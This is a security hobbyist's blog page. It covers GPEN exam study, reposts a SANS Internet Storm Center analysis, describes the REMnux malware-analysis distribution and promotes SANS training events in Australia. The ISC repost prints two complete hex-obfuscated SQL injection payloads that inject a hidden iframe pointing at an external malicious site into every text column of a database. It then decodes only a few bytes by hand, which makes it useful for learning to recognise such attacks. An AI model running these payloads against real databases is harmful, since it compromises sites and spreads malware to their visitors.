security.crudtastic.com

Security Nerd Stuff

Browsing Posts in sans

I’ll be honest .. after doing the Offensive-Security Pentesting with Backtrack course, sitting the SANS SEC-560 course lost a bit of its lustre for me. Nothing against the course .. it was awesome .. and I love all the SANS stuff!! The OffSec course though was pretty tough and I had only just completed it a few months before the SANS training, and to be honest, the OffSec course went a lot deeper.

I originally thought I’d give myself a break from doing SANS stuff for a while .. then I woke up yesterday .. and with 30 days left to sit the GPEN exam I booked it! Funnily enough, straight after that I looked at signing up for 2 other SANS courses ahahhahaah.

So now I have the task of getting ready to sit the exam in 15 days after not looking at the books in over 2 months (I'm so bad). This is very reminiscent of my GSEC study (do a search for my post) .. and I managed to nail that ok.

Anyway .. I'm whining about my GPEN when Chris is about to head off and tackle his GSE .. Good luck nerdlinger!!

A cool post from the SANS INTERNET STORM CENTER

Reader Alan reported a series of records that are similar to an SQL injection but are obfuscated. The following records were reported:

declare%20@s%20varchar(4000);set%20@s=cast(0x6445634c417245204054207661526368615228323535292c406320764152434841722832353529206465634c417265207461624c455f635572734f5220435552534f5220466f522053454c45437420412e6e616d652c622e6e614d652066726f4d207379734f626a6543747320612c737973434f4c754d4e73206220776865524520612e69643d422e696420614e4420412e58745950653d27552720616e642028622e78545950653d3939206f7220622e58547970653d3335206f5220422e78545950653d323331204f5220622e78747970453d31363729206f50454e205441624c655f637552736f72206645544348206e6558542046524f6d205461426c455f437552734f7220494e744f2040542c4063207768696c4528404046657443685f7374417475533d302920626547496e20657845632827557044615445205b272b40742b275d20536554205b272b40632b275d3d727452494d28434f4e5665525428564152434841722834303030292c5b272b40432b275d29292b636153542830783343363936363732363136443635323037333732363333443232363837343734373437303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324537303638373033463733363936343344333132323230373736393634373436383344323233303232323036383635363936373638373434433232333032323230373337343739364336353344323236343639373337303643363137393341364536463645363532323345334332463639363637323631364436353345202061732076615243486172283130362929272920464554436820 4e6578742066526f6d207441426c655f635572734f7220496e744f2040742c406320456e4420436c6f7365207461626c455f437552736f52206445414c4c6f43415465205461424c655f435552736f7220%20as%20varchar(4000));exec(@s);--

declare%20@s%20varchar(4000);set%20@s=cast(0x6465636c617245204054205661726368417228323535292c406320566172436861522832353529206465436c615265207441624c455f637552736f7220437552536f7220664f522073454c45435420412e4e616d452c622e4e616d652066726f4d207379734f626a6563547320612c735973634f6c754d6e73206220576865524520612e69643d422e496420416e4420612e78545970453d27552720414e642028622e58745950653d3939204f5220622e58747950653d3335204f5220622e78747950453d323331206f7220422e58747950453d31363729206f70454e207441426c455f437552734f72206665746348206e4578742046724f6d205441426c655f637572736f7220494e546f2040742c4043205748694c6528404066655463485f7374615475733d302920624547694e20455845632827557064615465205b272b40742b275d20536574205b272b40632b275d3d727472494d28434f6e7665525428764172434841722834303030292c5b272b40432b275d29292b63615374283078334336393636373236313644363532303733373236333344323236383734373437303341324632463645363536443646363837353639364336343639363936453245373237353246373436343733324636373646324537303638373033463733363936343344333132323230373736393634373436383344323233303232323036383635363936373638373434433232333032323230373337343739364336353344323236343639373337303643363137393341364536463645363532323345334332463639363637323631364436353345204173205641726348615228 31303629292729204645546348206e4578542046524f4d205441626c655f437572734f5220494e546f2040742c406320654e6420436c4f5365205461624c455f635552734f52206445416c6c6f43415445205461426c455f435552736f5220%20as%20varchar(4000));exec(@s);--

In both cases we see the use of the CAST command. What is its purpose? To convert information from one data type to another. Since the data inside the CAST is hexadecimal and conversion to varchar is requested, we can do the conversion manually with an ASCII table. Let's use the table at http://www.asciitable.com to perform the conversion. Keep in mind that two hexadecimal digits correspond to one byte. The conversion of the first seven bytes is as follows:

              ATTACK # 1                      ATTACK # 2
Byte    ASCII Equivalent          Byte    ASCII Equivalent
64      d                         64      d
45      E                         65      e
63      c                         63      c
4C      L                         6C      l
41      A                         61      a
72      r                         72      r
45      E                         45      E


REMnux: A Linux Distribution for Reverse-Engineering Malware

REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. The distribution is based on Ubuntu and is maintained by Lenny Zeltser.

About REMnux

REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that’s listening on the appropriate ports. REMnux is also useful for analyzing web-based malware, such as malicious JavaScript, Java programs, and Flash files. It also has tools for analyzing malicious documents, such as Microsoft Office and Adobe PDF files, and utilities for reversing malware through memory forensics. In these cases, malware may be loaded onto REMnux and analyzed directly on the REMnux system without requiring other systems to be present in the lab. You can learn about malware analysis techniques that make use of the tools installed and pre-configured on REMnux by taking my course on Reverse-Engineering Malware (REM) at SANS Institute.

What REMnux Is Not

REMnux isn’t a fancy distribution that was built from scratch… In simple terms, it’s a virtual machine that runs Ubuntu and has various useful malware tools set up on it. REMnux does not aim to include all malware analysis tools in existence. Many of these tools are designed to work on Windows, and investigators prefer to use Windows systems for running such tools. If you are interested in running Windows analysis tools on a Linux platform, take a look at the Zero Wine project. If you are looking for a more full-featured Linux distribution focused on forensic analysis, take a look at SANS Investigative Forensic Toolkit (SIFT) Workstation.

Original HERE

SANS Brisbane has just kicked off!!

More pics to come during the week

Following a very successful program in 2009, we are returning to Australia’s Capital City for SANS Canberra 2010 on 12-17 July to deliver SANS’ world-class information security training.

Register by 3 June to receive the best savings on the following courses:

For complete course descriptions see our Event-at-Glance page.

Put the skills you’ll learn to practical use and more than GIAC certified professionals who make the info sec industry safe! Visit the GIAC Roadmap page for more information and register for your certification attempt today!

SANS training is well-known for being relevant and pragmatic. Our Canberra 2010 instructors are industry leaders and experts who understand the challenges you face on a daily basis. Their real-world experience increases the practical value of the course material.

Classes will be held at the National Convention Centre in Canberra. Canberra is one of Australia's few planned cities, a place where architectural style complements the beauty of the surrounding Australian bush. Located on the ancient lands of the traditional owners, the Ngunnawal people, Canberra is thought to derive its name from the Aboriginal word Kamberra or 'meeting place.' Canberra is known for its hospitality, with trendy cafes, restaurants, nightclubs, museums, galleries and boutique shopping. Explore the city's trails and weekend markets for fresh regional produce and local wines.

To follow or tweet about this event, use hashtag #sanscanberra. Follow SANS at @SANSInstitute.

Get the training you need to advance your career. Start making your training and travel plans now to join us for SANS Canberra 2010!

http://www.sans.org/brisbane-2010/night.php

SANS @Night

Look Out! Open Source Extrusion Detection

- Eric Conrad
- Tuesday 25 May * 7:00pm – 8:00pm

Your firewall has been turned inside-out. With the advent of client-side attacks, infected USB drives, and infected mobile devices, perimeter network defenses have failed. The bad guys are already in. How do you stop them? By looking out. This talk will discuss techniques for detecting the outbound flow of sensitive information: extrusion detection. Eric Conrad will discuss the successful attacks and failed perimeter defenses that led to the creation of Xfiltr8, the open source Extrusion Detection live CD.

Read Eric’s bio here: http://www.sans.org/brisbane-2010/faculty.php

Location

The Marque
103 George Street
Brisbane, Queensland

To register:

Send RSVP to rkantor@shearwater.com.au

In the email please state:

Full Name

Company

SANS Brisbane 2010


SANS is bringing world-class training to Queensland for SANS Brisbane 2010 on 24-29 May! (http://www.sans.org/info/54773) Why not choose the beauty of the city along the Brisbane River as the backdrop for your training? Register by 14 April to receive the best savings on the following courses:

- Security 401: SANS Security Essentials Bootcamp Style (GSEC) taught by Mark Hofman, SANS Certified Instructor

- Security 560: Network Penetration Testing and Ethical Hacking (GPEN) taught by Eric Conrad, SANS Certified Instructor

Below is a brief snapshot of what each course covers. For complete course descriptions see: http://www.sans.org/info/54774

- SEC 401: SANS Security Essentials Bootcamp Style (GSEC).
In this course you will learn the language and underlying theory of computer security. At the same time you will learn the essential, up-to-the-minute knowledge and skills required for effective performance if you are given the responsibility for securing systems and/or organizations. This course meets both of the key promises SANS makes to our students: (1) You will gain up-to-the-minute knowledge you can put into practice immediately upon returning to work; and, (2) You will be taught by the best security instructors in the industry.

Maximize your training time and turbo-charge your career in information security by learning the full SANS Security Essentials curriculum needed to qualify for the GSEC certification.

- SEC 560: Network Penetration Testing and Ethical Hacking (GPEN) covers the ingredients for successful network penetration testing to help attendees improve their enterprise’s security stance.

FIND SECURITY FLAWS BEFORE THE BAD GUYS DO! We address detailed pre-test planning, including setting up an effective penetration testing infrastructure and establishing ground rules with the target organization to avoid surprises and misunderstanding. Then, we discuss a time-tested methodology for penetration and ethical hacking across the network, evaluating the security of network services and the operating systems behind them.

Both courses are associated with a GIAC Certification (GSEC and GPEN). Put the skills you'll learn to practical use and more than GIAC certified professionals who make the info sec industry safe! Visit http://www.giac.org/info/54779 for more information and register for your certification attempt today!

SANS training is well-known for being relevant and pragmatic. All SANS instructors are industry leaders and experts who understand the challenges you face on a daily basis. Their real-world experience increases the practical value of the course material. Here are some comments from recent alumni:

“The SANS class (SEC401) stands out above the rest because of the subject matter experts who teach the classes and labs.” – Shirlee Eitel-Birgham, State of Nevada

"Anyone who is in the network penetration testing field should take this course (SEC560) to improve your current skills and learn new ones." – Nick Ramser, Ohio State University

“This is the way you need to learn: roll up your sleeves, dig in to the fundamentals and the nitty-gritty technical details, and then go ’hands-on’ to practice and reinforce what you’ve been taught.” – Joseph Price, DoD

Classes will be held at the Marque Brisbane Hotel, which is located in the heart of the city and just a minute's walk from the Brisbane River. The central location is the ideal base from which to explore some of Brisbane's best attractions. Cruise the river, shop along Queen Street, enjoy the Treasury Casino or the South Bank Parklands. A special discount rate of AUS $179 S/D will be honored based on space availability. This discount is only available through 22 April, so take advantage of this special offer and make your reservations today! For more information see http://www.sans.org/info/54784

To follow or tweet about this event, use hashtag #sansbrisbane. Follow SANS at http://twitter.com/SANSInstitute

Get the training you need to advance your career. Start making your training and travel plans now to join us for SANS Brisbane 2010! (http://www.sans.org/info/54773)